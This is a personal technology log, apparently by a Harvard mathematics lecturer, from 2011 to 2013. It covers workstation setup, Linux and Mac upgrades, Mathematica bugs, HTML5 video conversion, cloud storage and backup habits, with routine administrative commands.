20-5-2013: A new workstation from Thinkmate: Intel Z77 chipset, VSX R4 320, Intel i7-3770 3.4 GHz, 4x8 GB PC3-12800 DDR3, 60 GB Intel 520 SSD for the OS, 2x2 TB SATA for data and backup, NVIDIA GeForce GT610. Gorgeous, quiet, beautifully built, well accessible and fast. The 32 GB of memory definitely helps with larger Mathematica jobs (Mathematica 9 gobbles up even more memory than Mathematica 8 and I had more frequent crashes). It was time for a new 27 inch screen; while I run 1920x1200 (WUXGA) on the home Linux box, the iMac with 2560x1440 (WQHD) made me hungry for more screen estate and I now got a WQHD screen in the office too. Vendors have finally "got it" that screens like SXGA (1280x1024) make productive work hard. The latter means having books and articles open for reference, a computer algebra system working, and some terminals with code and text editors, all at the same time. XGA has become the new VGA (wow, the latter was cute). Back to hardware: here are pics: Pic 1, Pic 2 after opening the box. One Linux issue (unrelated to the hardware) came up when setting things up: while I knew that the permissions of the .ssh directory are crucial, I had by accident my home directory with 755 permissions and "password free login" did not work. So not only the .ssh directory, but also the /home/user directory has to have the right permissions (like 700). I only noticed after turning on debug mode in sshd_config.
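The permission issue can be replayed in a scratch directory; a minimal sketch (the demo path and user name are invented): sshd's strict-modes check silently rejects key-based login when the home directory itself, not just .ssh, is group- or world-writable.

```shell
# Demo of the permission requirement in a throwaway directory: the home
# directory itself must not be group/world accessible, not only .ssh.
demo=$(mktemp -d)
mkdir -p "$demo/home/user/.ssh"
touch "$demo/home/user/.ssh/authorized_keys"
chmod 755 "$demo/home/user"                 # the accidental setting that broke login
chmod 700 "$demo/home/user"                 # the fix
chmod 700 "$demo/home/user/.ssh"
chmod 600 "$demo/home/user/.ssh/authorized_keys"
stat -c '%a' "$demo/home/user" "$demo/home/user/.ssh"
```

On the real machine the same three chmod lines applied to /home/user do the trick.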
14-5-2013: Amazing how much space Windows 7 can gobble up in a short time. Made a fresh install on an older MacBook Air using Boot Camp and had initially assigned 15 GB. After trying out some scanning software for the Kinect, the assigned Windows partition was already full and I needed to repartition. The program from Coriolis Systems worked perfectly and fast! It also includes a tool to build a temporary system on a memory stick in order to resize the boot hard drive. One caveat: my memory stick had only 32 GB and reassigning 30 GB for the Windows partition did not work because the memory stick was not big enough. I had to reduce to 25 GB. That worked. By the way, the MacBook Air makes a gorgeous Windows machine, nicer than anything else seen lying around in the shops. In comparison, all these Windows laptops are either crap or heavy or have miserable screens. To try out the 3D scanning software, I got a Windows 7 OEM license because for some reason, the Harvard licenses did not work. The Artec scanner can scan objects with a frame rate of 10 FPS. I was surprised; I had expected that a heavy gaming machine with a decent GPU would be needed to achieve that.
11-5-2013: Encrypted media seems like a waste of time, because if a movie is visible on a computer screen, it can be captured. But then, in the long term, the tendency could be to close down computer architectures (tablets and UEFI are a start), where the user is no longer in charge of the hardware. Similar to cars, where it is now almost impossible for the customer to do repairs beyond basics like the alternator, spark plugs, batteries or timing belts. On the other hand, one will hardly be able to close computer architectures completely. Projects like Arduino or products like the Raspberry Pi, together with Linux and open source software, will most likely always provide a way to back up media, even if the encryption is unbreakable. And then there is the analog hole: even a totalitarian law forbidding free computer hardware cannot prevent content from being captured in high definition from the screen with a high definition camera, where with a decent setup the quality can come close to the original digital format. One has to suspect therefore that the WWW consortium follows DRM media implementations only because it helps to kill Flash and Silverlight faster. But they are almost dead anyway. RealPlayer died so fast that one could hardly blink. Silverlight is done as soon as Netflix has switched, and even Adobe does not believe in Flash anymore.
03-5-2013: Amazing. Unreal Engine in Javascript and WebGL.
03-5-2013: The Register has a story about video pushed by JavaScript. Have to see this first. Did not find it yet at otoy.
02-5-2013: The very first page on the web is remarkably modern and clear. No second guessing needed to navigate. Of course, there is not much content yet: lots of gopher links, no pictures, movies or interaction. Web forms (example) were ASCII based and sent by email. Happy 20th anniversary of web technology.
01-5-2013: After having used Mathematica 9 for a while now, there are surprisingly few changes. I had to adapt names in my old programs like "Prism" or "RandomFunction", which had not existed in Mathematica 8 and now clash with built-in symbols, so my own versions needed to be renamed. Mathematica 9 also grabs more memory in general than its predecessors, leading to earlier crashes, especially with the frontend. All reasons to avoid the frontend as much as possible, and a reason to upgrade the MacBook Air.
31-4-2013: Open book on low cost 3D printing. There is also a contribution by Liz and myself inside. Thinking like a 3D printer has advantages also when visualizing mathematics without the printer. The graphics get nicer. example.
30-4-2013: A Spiegel article mentions an amazing visualization of Pi as a random walk. This is a place where Flash still shines and is unmatched by any other technology.
27-4-2013: The Spiegel has an interview with Wolfram about the new Facebook features in Wolfram Alpha. I saw the demonstration Stephen Wolfram gave at Harvard two weeks ago and it was impressive how fast the graph algorithms worked interactively. Working on some graph geometry myself, I know that with larger graphs, things can get slow.
24-4-2013: Just got the social media guide from the Harvard summer school. Just common sense advice. Here is a social media survival guide at the Harvard Business Review.
11-4-2013: A nice short article explaining H.265. The key idea is a smarter picture subdivision scheme. Some smartphones support it already.
22-3-2013: Working on a zeta graph confirmed that most computing work is spent working around limitations of programs or languages. Instead of figuring out all the angles and tweaks of a built-in routine in a complex program, it is often faster to build the routine from scratch if certain conditions and limitations need to be satisfied. Generic routines need to work in very general situations and can therefore not be optimal in specific circumstances.
16-3-2013: It's amazing how somebody managed to use the spammers' embedded-pixel trick to set up a business. I'm surprised that this actually works, since it has always been considered smarter to have email clients not load images by default.
15-3-2013: From a NYT Sunday Review, an interesting observation: "The concepts of work and play have become farcically reversed: schoolwork is meant to be superfun; play, like homework, is meant to teach."
9-3-2013: An upgrade of Verizon FIOS to a faster speed gave a good speed test.
8-3-2013: Here is a list of what I would currently look at as the ten biggest sins of web content:
  1. rigidity: in geometry and format, assume tablet or force app
  2. curiosity: sniff user agents, IP address, cookies and personalize content
  3. fragmentation: split pages into many subsections to get more page counts
  4. complexity: javascript for video, flash for pictures or navigation
  5. cleverness: need user manual or have adventure skills to access content
  6. appearance: content should always come before "how it looks"
  7. greediness: tiny pictures only, streaming video, too many ads
  8. volatility: content is removed or relocated or uses horrid URLs
  9. obfuscation: iframes with hidden URLs, long URLs, individualized URLs
  10. walled off: access only through registration, walled off content
29-2-2013: Math in movies is now converted to HTML5 video. Since Adobe decided last year to end support for Linux in new versions, Flash will pretty soon no longer be an option for me. Conversion to HTML5 is annoying for two reasons. First: transcoding the movies is slow, buggy, and degrades quality if files need to stay small. When converting to Theora or WebM, there can be hiccups: files getting too large, lacking sound or getting out of sync. Sometimes, proprietary conversion software is needed. Second: storage space and backup space get multiplied, because Theora, WebM, H.264 and Flash versions are all needed to reach everybody. This means at least doubling the size, even if the site already had Flash and Quicktime versions. What would be nice is a standalone Unix application (not depending on any libraries nor version of Linux) which takes any movie format and spits out all 4 formats .flv, .mp4, .webm, .ogg in an optimized way. I have a script, but it is neither optimized nor reliable, and also too library dependent.
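The skeleton of such a wrapper could look like the following dry-run sketch (hypothetical: it only prints the ffmpeg invocations rather than running them, and real use would need per-format codec and quality flags to keep files small and in sync):

```shell
# Hypothetical helper: for each input movie, print the ffmpeg command
# producing each of the four target formats. Remove the echo to transcode.
convert_all() {
  for f in "$@"; do
    base="${f%.*}"
    for ext in flv mp4 webm ogg; do
      echo ffmpeg -i "$f" "$base.$ext"
    done
  done
}
convert_all lecture1.mov
```

The loop structure is the easy part; the hard part remains choosing codec settings that avoid the sound and sync hiccups mentioned above.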
19-2-2013: Copernicus on Google. The JavaScript is a bit obfuscated. I have been a big fan of JavaScript; in 2000 an example with Chaikin interpolation. The problem with JavaScript today is that for optimization reasons it is written in a way which is hard to parse. I did not rewrite the Copernicus animation (as for the Apple one), but it would take less time than understanding what the code does.
13-2-2013: Something to make LaTeX more popular. For me, another reason to use LaTeX is to use the editor I use for everything else. A "cloud" solution would therefore never cut it. The examples are well chosen.
20-1-2013: A refreshing article on typography. I'm not sure about the adaptive layout: it can break more easily if done wrong, and it is a cage which gives the reader less control. It is of course more and more the trend. For a simple page like the one mentioned above, it works well.
17-1-2013: Tried out Atlas, a differential geometry package for Mathematica. It's quite nicely done. Having programmed most of the basic stuff like connections and curvatures myself in Mathematica already, especially for this project, it can be handy to compare results.
8-1-2013: While installing a Windows 7 virtual machine in Ubuntu, the question popped up: why does the program itself now come in different flavors? "qemu" would suffice, as it was before. The program could figure out whether it is a 64 bit system by quickly checking uname -m. It's a small matter, but having to use new names like "qemu-system-x86_64" breaks all tutorials. When virtualized, Windows 7 needs at least 9 GB of HD space and also enough memory. A 12 GB image and 512 MB of RAM worked when installing it on a 64 bit Ubuntu system:
qemu-img create win7.img 12G
qemu-system-x86_64 -hda win7.img -cdrom Win7_64_EN_DVD.iso -m 512
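The old single entry point could be approximated with a small wrapper along these lines (a sketch; the case table only covers the common PC architectures and the fallback assumes the qemu-system-* naming scheme):

```shell
# Hypothetical wrapper restoring a single "qemu" command: pick the system
# emulator matching the host architecture reported by uname -m.
arch=$(uname -m)
case "$arch" in
  x86_64) QEMU=qemu-system-x86_64 ;;
  i?86)   QEMU=qemu-system-i386 ;;
  *)      QEMU=qemu-system-$arch ;;   # assumption: name matches uname -m
esac
echo "$QEMU"
```

One could then call "$QEMU" -hda win7.img ... without caring about the host architecture.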
28-12-2012: Here is a Mathematica inconsistency which almost drove me insane when computing with Dirac matrices. I only could solve it with the help of Newton. It is a basic computational flaw in the Eigenvectors routine which does not appear for generic matrices. One would expect that Eigenvalues and Eigenvectors match up. They often do, and actually do when the matrix is integer valued. With the same matrix given with real entries however, the behavior is different. Here is a simple example: the matrices A0, A1 are the same except that A1 consists of floating point numbers.
 A0={{0, 0, 0, 0, 0, -1, 0, 0, 0, 1}, 
{0, 0, 0, 0, 0, 1, -1, 0, 0, 0},
{0, 0, 0, 0, 0, 0, 1, -1, 0, 0},
{0, 0, 0, 0, 0, 0, 0, 1, -1, 0},
{0, 0, 0, 0, 0, 0, 0, 0, 1, -1},
{-1, 1, 0, 0, 0, 0, 0, 0, 0, 0},
{0, -1, 1, 0, 0, 0, 0, 0, 0, 0},
{0, 0, -1, 1, 0, 0, 0, 0, 0, 0},
{0, 0, 0, -1, 1, 0, 0, 0, 0, 0},
{1, 0, 0, 0, -1, 0, 0, 0, 0, 0}};
A1={{0., 0., 0., 0., 0., -1., 0., 0., 0., 1.},
{0., 0., 0., 0., 0., 1., -1., 0., 0., 0.},
{0., 0., 0., 0., 0., 0., 1., -1., 0., 0.},
{0., 0., 0., 0., 0., 0., 0., 1., -1., 0.},
{0., 0., 0., 0., 0., 0., 0., 0., 1., -1.},
{-1., 1., 0., 0., 0., 0., 0., 0., 0., 0.},
{0., -1., 1., 0., 0., 0., 0., 0., 0., 0.},
{0., 0., -1., 1., 0., 0., 0., 0., 0., 0.},
{0., 0., 0., -1., 1., 0., 0., 0., 0., 0.},
{1., 0., 0., 0., -1., 0., 0., 0., 0., 0.}};
G0=Eigenvectors[A0]; n0=Length[A0]; l0=Eigenvalues[A0]
G1=Eigenvectors[A1]; n1=Length[A1]; l1=Eigenvalues[A1]
Chop[Table[Max[N[Abs[A0.G0[[k]]-l0[[k]] G0[[k]]]]],{k,n0}]]
Chop[Table[Max[N[Abs[A1.G1[[k]]-l1[[k]] G1[[k]]]]],{k,n1}]]
A remedy is to avoid the "Eigenvectors" routine entirely and to use "Eigensystem", where the inconsistent behavior is absent. In other words, use "Eigensystem[A][[2]]" instead of "Eigenvectors[A]".
 {l0,G0}=Eigensystem[A0]; {l1,G1}=Eigensystem[A1]; 
Chop[Table[Max[N[Abs[A0.G0[[k]]-l0[[k]] G0[[k]]]]],{k,n0}]]
Chop[Table[Max[N[Abs[A1.G1[[k]]-l1[[k]] G1[[k]]]]],{k,n1}]]
Strictly speaking, the behavior is not a bug, because the routine "Eigenvectors" does not claim to list the eigenvectors in the same order as "Eigenvalues". But it is cruel for the user (I lost at least a day of work and almost my bearings finding this, because I expected the error to be in my own programs). The order mismatch is rare. It appeared here because Dirac matrices have lots of symmetry. By the way, the matrix A0 is the square root of a doubled Laplacian. I had dealt with such Laplacians in my thesis already, where it was shown that every Jacobi matrix L can be factored L = D^2 + c with another Jacobi matrix D. Iterating the construction led to almost periodic operators with spectra on Julia sets of the complex map f(z) = z^2 + c.
24-08-2012: A survey on technology in higher education.
11-06-2012: I could see a demo and then try it out myself: the Microsoft Surface at Cabot library. It is unbelievable that this screen only has a 1920x1080 pixel resolution! Additionally, the system is very closed. One can only access Bing images and maps and built-in documents, and there is not even a web browser. Compare the resolution with the latest MacBook Pro announced today with its 2880x1800 resolution. The screen resolution of PC laptops and monitors (like 1920x1080) becomes more and more questionable. One has a hard time finding a decent high resolution monitor which does not break the wallet.
07-06-2012: Strange how several things can fail at once. A 2 year old solid state drive at home started to fail. At first, only temporary glitches appeared, with files starting to disappear and programs stopping at strange moments even though the system was up, finally more and more segfaults. Simultaneously, the graphics card started to choke up and a hard drive cable to a regular HD failed too. With different things failing, it is harder to debug. Things are of course always linked. For example: when trying to debug a drive, cables are moved and checked and drives are changed; these manipulations can damage another, previously healthy cable. Related: Ubuntu installs the bootloader by default on a different drive. It's better to use a custom installation, then make sure that both the bootloader as well as the OS are on the same SSD drive. It's easier to debug in case of drive failures. With a separate setup, one can for example unmount a drive and analyze it.
06-06-2012: Whiteboard on the iPad is also nice to use because it allows one to see Flash content from the iPad (the host computer has the Flash plugin). Unfortunately, when using it in a university setting, one can make a local network but then not use the web. Splashtop streamer does not go through the Harvard wireless (maybe on purpose, since that's a big bandwidth hog).
01-06-2012: The Harvard IT summit was nice and well organized. Anant Agarwal talked about edX and demonstrated an electronics course which has 120 thousand students enrolled. Of course, the drop-out rate is high; only 10K took the midterm. Summit handouts.
10-05-2012: Cool. The Harvard bookstore now allows one to print books. Featured in Forbes. Despite the fact that electronic books become more and more common, there are advantages to real books. I do not always finish reading an electronic book; the attention span is smaller. Could well be that real books and electronic books continue to coexist. I personally like to have both the electronic and the real version; the electronic version is especially convenient for searching things.
05-05-2012: A cool theorem generator and the Snarxiv.org preprint archive and Philosophy of the day.
05-03-2012: Larry Gonick, who just published a Cartoon Guide to Calculus, talked yesterday at Harvard. He showed lots of cartoons, also from other cartoonists like the Mexican cartoonist Rius, as well as older stuff of his own. Larry Gonick had been a Harvard math concentrator but did not graduate. It became apparent that Gonick's contribution to making science and history more accessible is invaluable. He might achieve more with his comics, especially the chemistry, biology or technical cartoons, than any standard textbook, and can make complex things accessible to a larger audience. One of the questions which came up was how cartoonists can finance themselves. Gonick had been lucky to have some mentorship by Jacqueline Onassis. Gonick seems to believe that not only newspapers but also books are doomed, and that authors might have to turn back to getting sponsored as happened in the past. Gonick might actually prove otherwise with his own work, both for newspapers and books.
19-01-2012: Just tried out iBooks Author. I find it even easier to use than Pages, which sometimes produces layout difficulties. Whether this will change the textbook remains to be seen. The fact that everybody can make music with GarageBand has also not necessarily changed the way music is consumed. It's nice that one can now easily build books for the iPad with interactive media. It will be great for the classroom. [Update Jan 23, 2012: each page has to be worked on in landscape and portrait mode. This can lead to some frustration because the layout needs to be done twice. The page layout is a bit quirky: changing things in landscape mode can have unexpected consequences in the other mode.]
21-12-2011: A good article in the Stanford Law Review about SOPA. Despite an apparent stall, and warnings from law experts, business scholars, engineers, comedians, founders of internet companies and bloggers, there will be a special session today.
11-11-2011: With Adobe Flash retreating and Silverlight dying [I use Silverlight only for Netflix and it starts having problems in OS X. Plugin problems are an early indication of trouble. Remember RealAudio], the question whether to switch to HTML5 has become more pressing. I maintain a math movie page (with currently 4 GB of movie files) and rhetorik.ch, where movie files contribute the bulk of the currently 40 GB of hosted material. While the conversion is trivial technically and can be done as a batch job using ffmpeg (like ffmpeg -i file.flv file.mp4; ffmpeg -i file.flv file.ogg), the conversion to HTML5 would triple the space. HTML5 does still not work everywhere and a Flash backup is needed. Problems remain for various operating system and browser combinations, especially in Linux, where sound problems with ogg or mp4 files are still common even with fresh installations of the newest Ubuntus. But the major issue is space and thus hosting bandwidth. On a page with a few dozen movie files, the question is of course not relevant. Switching to HTML5 would mean tripling the hosted space (because mp4, ogg and flv files need to be created in addition to the native source files, which are Quicktime files in my case). Because websites as well as workstations need to be backed up, and the "video technician's" work space contains a multiple of the actual hosted page (for rhetorik.ch, I have collected about 20 GB of media files per year on average over the last couple of years), a switch to HTML5 could mean that 2 TB hard drives are no longer enough. To summarize, a switch to HTML5 would cost not only more work but also a couple hundred bucks more per year in order to work reliably. The additional costs come because hard drives need to be replaced regularly for reliability purposes, and regular backups on media which are no longer overwritten need to be created and stored externally. Costs could become even higher with hosting bandwidth tripling.
There is no doubt that switching to plugin-free video is the future, but the lack of a single standard, forcing several parallel implementations, makes it still impractical when time and money budget constraints are present and the websites are reasonably large.
11-2-2011: Examples where UI simplifications went too far: 1) In many applications like Preview in OS X Lion, it is no longer possible to "Save as". It has been replaced by "Save a version". Fortunately, there is still the command line. 2) Unity in Ubuntu: I agree with most critics that it has been dumbed down so much that it has become unusable. Windows often can no longer be resized as usual; for example, after opening a terminal from the dock, a second terminal would not open. Getting to applications is too complicated. Fortunately there are other window managers like Blackbox or Fluxbox. 3) Firefox application handling: it is no longer possible to edit freely how applications are handled. The option "Save as" has disappeared for many entries like "apt", where it is assumed that one would not want to save a .deb file. 4) Unlike in OS X Snow Leopard, in OS X Lion even third party screen capture programs can no longer access screen buffers while iDVD is running. It forces the user to rip the DVD first.
10-19-2011: Tried an iterated Ubuntu upgrade without a fresh install. Back in my redhat/mandrake/early Ubuntu times, upgrades often led to dependency problems which usually implied system paralysis. A stepwise upgrade from Ubuntu 9.04 to 10.10 went surprisingly well now, even though it took an entire night. From 9.10 to 10.04, the X configuration broke (I had to use a backup xorg.conf). From 10.04 to 10.10, the session managers got confused (gdm and lightdm competed), which did not bring up the login screen and made a remote login necessary. Also the "software-center" in "blackbox" did not spawn a new screen and needed switches to "unity". The "evolution" mail reader I had used for reading archived mbox mail files no longer reads mbox files and had to be replaced by "Thunderbird", which handles mbox files well. I might still have to do a fresh install on a new SSD because the upgrade ate additional space. [Update of October 25: more upgrade issues: "evince" and "banshee" sometimes brought down the machine and needed to be removed; also "xlock" behaved in a weird way and sometimes needed a remote login to be killed. Heavy rsync processes slowed down the machine more than in Ubuntu 9.10. Copy-paste problems with German Umlaute in xterm have cropped up again and a shell script wrapper around xterm which first sources the local ~/.bashrc file is necessary. By the way, also OS X does not copy-paste Umlaute correctly into a terminal and a complicated switch of language is required.] [Update Nov 2: reinstalled Ubuntu 10.10 (64 bit) from scratch on a new 128 GB SSD by cloning the package list: "dpkg --get-selections > installed.txt" on the old system and "dpkg --set-selections < installed.txt" followed by "apt-get dselect-upgrade" on the new. I had initial sound problems which were solved after disabling the automatically chosen high def audio controller.
Keeping the habit of replacing hard drives regularly and not having done so for 18 months, I also switched to a 2TB main hard drive, even though the Thailand floods probably make it the worst moment to do so. Still, HD prices could go up even more. A WD Caviar 7200 RPM workhorse speeds up rsyncs considerably (I sync several hundred gigs daily), while cheaper, slower but greener 5900 RPM drives serve well as secondary backup drives; of course fast SSDs are used for the operating systems and make a huge difference.]
20-09-2011: The upcoming Kindle Fire will be fast, but having all data go through Amazon's servers raises concerns. The "mighty Amazon proxy" can still be turned off. Unlike a proxy or internet provider, Amazon will store web addresses, IP and MAC addresses, and also store the websites temporarily on their local servers.
24-09-2011: Strange: I can access some files from home but not from the Harvard network (nor could my students). No local .htaccess files are in place. The only explanation is that certain folders are filtered. After copying the "hourly" folder over to the exam1 folder, the files become accessible. A similar thing had taken place for "homework". More details here.
06-09-2011: A video giving a glimpse of Color E-Ink technology for electronic textbooks in the future. One of the problems with E-ink today is that documents with lots of detail, as in mathematics or the sciences, do not display well yet. This will change.
04-09-2011: An interesting article in the NYT shows interactive whiteboards in the Kyrene school in Arizona. "The digital push here aims to go far beyond gadgets to transform the very nature of the classroom, turning the teacher into a guide instead of a lecturer, wandering among students who learn at their own pace on Internet-connected devices." My own take on this: as the history of teaching with technology has shown, pilot projects do not say anything. Pioneers are always especially motivated and want their projects to work and justify the investments. It is always a "huge success". Whether the concept works on a wide level is not clear. A major obstacle is that teaching with technology in a classroom where students go at their own pace is challenging for the teacher. There is a risk of losing focus, missing preparation and less commitment to reach minimal goals for every student. We have also learned from the past that once the "coolness factor" is over, many technologies can produce aversion, especially if they are used in a wrong way or overdone. This happened with calculators, overhead projectors, powerpoint presentations and clickers: in the case of calculators, teachers started to focus on the graphing calculator itself, whose use reminds one of cellphones before smartphones came in; in the case of presentations, students would just copy-paste information from the web into powerpoint, and teachers would recycle overhead slides or powerpoint presentations from other teachers or previous years; in the case of clickers, the technology would be used for class attendance or to evaluate students. I myself think that the future is in using a large variety of tools and methods. Experiments as described in that NYT article are extremely valuable. 
Technology-wise, interactive tablet-like "white boards" will certainly become part of any classroom, in such a way that every wall can morph into a blackboard, a monitor or an interactive whiteboard on which interactive "apps" can run.
10-07-2011: The new feature "Versions" on Lion can grab a lot of disk space. Once close to the hard drive limit, there is no rescue anymore and the user is pushed over the abyss. The warnings come too late. Even deleting 10 Gig does not help anymore; a reboot is necessary. I constantly fight with disk space on my "macbook air" and walk a dangerous line. While preparing for a review summer school (where Keynote files can be several gigabytes large), I lost the work of an evening because all "versions" were gone. [Unchecking "Restore windows when quitting and re-opening apps" in System Preferences/General solves the autosave issue.]
07-07-2011: An interesting article on grading. It reports on experiments to replace grading by teaching staff with "evaluators" or robots. Separating grading from the teaching staff is also an attempt to fight grade inflation. "Western Governors", mentioned in the article, is an online university where things are more geared towards technology. In my experience, exams which are "computer gradable" still tend to be poor and uninspiring, and need substantial authoring effort to be effective. Already in mathematics, we can see during the grading phase that students have come up with innovative ideas and angles which were not anticipated. A machine would overlook them or grade them wrongly and nobody would notice. Another challenge with online examinations is to assure that the exam is taken without external human or technological help. Tests which are easy to grade tend also to be easy to beat with technological help: in the simplest case, just enter the question into a search engine.
05-08-2011: While grading mathematica projects and rendering some of the graphics, I could confirm what students tell me: Mathematica 8 can run out of memory, even with modest graphics jobs. Crashes come without warning and are especially annoying when using the front end, because work gets lost. I personally do not use the Mathematica "front end" most of the time and have access to machines with up to 24 Gig of memory, so I can often avoid the problem. On the feature and coolness side, Mathematica has made lots of progress and graphics can be gorgeous. Mathematica 8.0 still needs more stability. Even with 8 Gig of RAM, things crash more often than with Mathematica 2.0 back on my NeXTstation with 8 Meg of RAM.
03-08-2011: Mathematica theoretically should be able to access mysql servers:
Needs["DatabaseLink`"]; JDBCDrivers["MySQL(Connector/J)"];
OpenSQLConnection[JDBC["MySQL(Connector/J)", "db"], "Username" -> "root", "Password" -> "pwd"]
It does not work for me (JDBC:error: Communications link failure). It is easy, however, to just extract the tables from mysql with Perl and write them out in a form which is readable by Mathematica.
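The extraction route can also be sketched in Python; in this hypothetical illustration the standard library's sqlite3 module stands in for the MySQL server (the table and column names are made up), and a small helper prints the rows in Mathematica's nested-list syntax:

```python
import sqlite3

def to_mathematica(rows):
    """Render rows of numbers/strings as a Mathematica list expression."""
    def atom(v):
        # Strings get quoted; numbers are printed as-is.
        return '"%s"' % v if isinstance(v, str) else repr(v)
    return "{" + ", ".join(
        "{" + ", ".join(atom(v) for v in row) + "}" for row in rows) + "}"

# sqlite3 stands in for the real MySQL connection here.
con = sqlite3.connect(":memory:")
con.execute("CREATE TABLE points (n INTEGER, label TEXT)")
con.executemany("INSERT INTO points VALUES (?, ?)", [(1, "a"), (2, "b")])
rows = con.execute("SELECT n, label FROM points ORDER BY n").fetchall()
print(to_mathematica(rows))  # -> {{1, "a"}, {2, "b"}}
```

The printed expression can be pasted into a notebook or read with Get/ToExpression; a Perl script against the real database would do the same quoting.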
31-07-2011: I added DuckDuckGo as a remedy to avoid the search engine bubble.
29-07-2011: I tried out the "Ubuntu one" cloud services. I do not use desktop tools like nautilus, so command line sharing is the only option. One has to install u1sdtool and type
 u1sdtool --list-folders 
u1sdtool --create-folder /home/user/path/to/directory
to share the directory. "Ubuntu one" is not yet available on OSX however.
28-07-2011: After using Lion for more than a week, the biggest nuisance is the sluggish "Preview" application, both for opening and closing large documents as well as for scrolling through them. Opening or closing can take minutes - unbearable. I suspect that "versions" is the culprit. Besides Quicktime, Preview is one of the reasons I use the Mac regularly: "Preview" allows one to rearrange, copy-paste and reorient movies or PDFs. Lion also by default restarts previously open applications after a reboot. [update September 4, 2011: as mentioned in a heise article,
defaults write com.apple.Safari ApplePersistenceIgnoreState YES
defaults write com.apple.Preview ApplePersistenceIgnoreState YES
defaults write com.apple.Keynote ApplePersistenceIgnoreState YES
solves this. It seems that the reason for start-up lags is often that the application no longer finds old documents and searches for them. This is often the case for me because the laptop is only used for temporary work.]
22-07-2011: The google logo from today embeds the PNG data directly in the style file as a data URI, which makes it possible to animate it. Here is the picture only. Look at the source.
20-07-2011: I installed Lion on two computers. Instructions on how to get a bootable USB stick are everywhere. The installation with the USB drive on the Mac Air was actually faster than on the much mightier iMac (using the native installation). Lion is much snappier than Snow Leopard (with the exception of "Preview", which can lag, probably due to "versions"). Latency is the worst enemy of a good user experience. Some applications no longer work: Graphing calculator, the 360-com unwrapper and the 2004 Microsoft Excel, Word and Powerpoint. Good riddance for the latter. The Lion installation ate 3 additional Gigs on my already maxed out mac air. I could not turn off legacy file vault for example. [Update July 21: without having to ask I got a copy of Graphing calculator 4.0 by mail from pacifict.com. Nice.] [Update July 22: after upgrading the developer tools, which I always need (I use "make" for almost everything), "Lion" devoured in total 6 gig, even after deleting the XCode installation and the /Developer directory. Since I use the laptop only for temporary work, I sync the necessary folders back and forth from my linux box, but Keynote presentations and music files gobble up the available user space pretty fast. It is clear that my next macbook air will have 256 Gig.]
13-07-2011: After the drop box EULA disaster, a good summary of some cloudy cloud issues. Besides ownership issues and risks, the cloud services I had tried out also only work well with small amounts of data and choke on more. A few hundred or maybe a thousand files work well, but that is nothing today. Another issue which will slow down these data services are cable provider bandwidth caps. Legal, reliability and bandwidth reasons, in addition to latency issues (see the July 5 entry), will also be a big obstacle for google chromebook adoption.
05-07-2011: Funny that the battery problems of my ipod touch disappeared after a recent jail break. Apple should definitely add a preference entry to remove multitasking. In general I try to run as few processes as possible on any computer. Sometimes this is important, as with huge Mathematica jobs (even in Linux), which are notoriously memory hungry. On the ipod touch, I prefer to have one process at a time. It is the fractions of seconds of delay in a program which drive the user nuts. Latency is a big stress factor. That's why I use linux, lean window managers, solid state drives and remove any processes which are not needed.
27-06-2011: Changed my homepage from Google to Yandex. The black navigation bar is too ugly to bear. It's strange how little things can annoy, but with a black desktop background, the browser showing the google main page appears to be cut in two.
27-06-2011: I bought one of the new cheap Nooks. PDF reading does not always work well, especially if files have been written in latex and contain mathematical content: there are font size and line break issues, and not all pictures appear. As a text reader, however, it is terrific. When hooked up by USB, the nook can be accessed as a drive. Also the fact that documents can be loaded onto Micro SD cards is nice: with 32 Gig, I can put all the book PDFs onto it. Unfortunately, most books are in DjVu format and there is no luck with that. It would be nice if one could put content onto it wirelessly. Also nice would be a program which trims PDFs so that they read nicely on the nook, possibly cutting away stuff which does not render well.
09-06-2011: Interesting Google Logo today.
22-05-2011:
A NYT article addresses the issue of personalized and localized search. It has become a nuisance to search for something only to get results connected to me. Localization and device dependence are even worse (examples: I cannot reach "google.com" from Switzerland and get directed to "google.ch"; certain news websites like the NYT limit access for ipads). Today, in order to get unbiased search results, it is necessary to turn on "privacy filters" or to use proxies. Otherwise, we get fed results which fit a profile that has been made about us. Search has thus become less reliable. The google matrix has become relative. This is a problem because "facts and information" become relative. Imagine getting the news modified to your place or to your political opinion. We like to read our own opinion, but we start to live in parallel universes where each person gets fed an individualized internet soup. It is not that the rest of the internet does not exist, but parts of it become unreachable if search no longer leads to them. We live in a "fragmented web".
15-04-2011: I'm not a friend of "cloud" stuff (yet), but since more and more people around me use dropbox, I had to try it. Security with dropbox is a big issue for me. In that respect Wuala is better. It had originally been developed at my alma mater ETH; the name comes from "Voila". As with Dropbox, one can copy or sync files into the shared folder. Some issues: in linux, if wuala does not run and "ls" is done, a message ls: cannot access WualaDrive: Transport endpoint is not connected appears. One can get rid of this with fusermount -u WualaDrive. Both in linux as well as in OSX, the mounted javafs can produce some user lag on the command line. Wuala still needs to reduce its footprint. Still, having everything encrypted on the client side is essential and the only option for education, just as for health care. A third party outside the university should not have access to student, patient or research data.
03-04-2011: Academic use of Social media, May 3, 2011
16-04-2011: An example of a Prezi presentation by Alison Blank. The idea is good but I doubt it will replace powerpoint. The problem with nonlinear presentations is that one can easily get lost. A nonlinear mindmap structure is nice for organizing topics and for good speakers like Chris Anderson, who seems to be assisted in running the nonlinear presentation during the talk, or has linearized the presentation for the talk.
15-04-2011: The ears PRS looks very promising. Some questions by Brian Lukoff used in my 1a class.
22-03-2011: I use several backup layers under linux (flashback while working; half-daily full backups done on internal backup drives by cron; syncs with different machines several times per day; weekly long-term backups on a different drive; and also "write only backups" on hard drives which are encrypted, stacked and regularly sent out of town). It was still possible to lose data: just before spring break, I had been writing a handout for a course, and later in spring break I noticed that the file had been overwritten by another file (I must have copied a template to the wrong place at some point and not noticed for several days). By the time the problem was noticed, all five shorter-term backup layers had been overwritten, and the longer-term (read only) backups had not yet kicked in. I had lost the handout. Fortunately, I had a printout, since it had been given to the class already before the spring break, and I could just retype it. But it was annoying. That day, I bought an additional 4TB drive, attached it to a mac by firewire and now back up part of my linux box on the mac, where OSX keeps old versions with time machine. I hope TimeVault (which is still alpha) will mature soon.
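What was missing in that incident was versioning on overwrite. A toy sketch of the idea, in the spirit of what Time Machine or TimeVault provide (the function name and timestamp format are my own choices, not any tool's actual behavior):

```python
import os
import shutil
import time

def copy_keeping_versions(src, dst):
    """Copy src to dst, but first move any existing dst aside under a
    timestamped name, so an overwrite never destroys the previous contents."""
    if os.path.exists(dst):
        stamp = time.strftime("%Y%m%d-%H%M%S")
        shutil.move(dst, "%s.%s" % (dst, stamp))
    shutil.copy2(src, dst)  # copy2 preserves modification times
```

Copying a template over the handout through such a wrapper would have left the old handout sitting next to the new file instead of silently destroying it.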
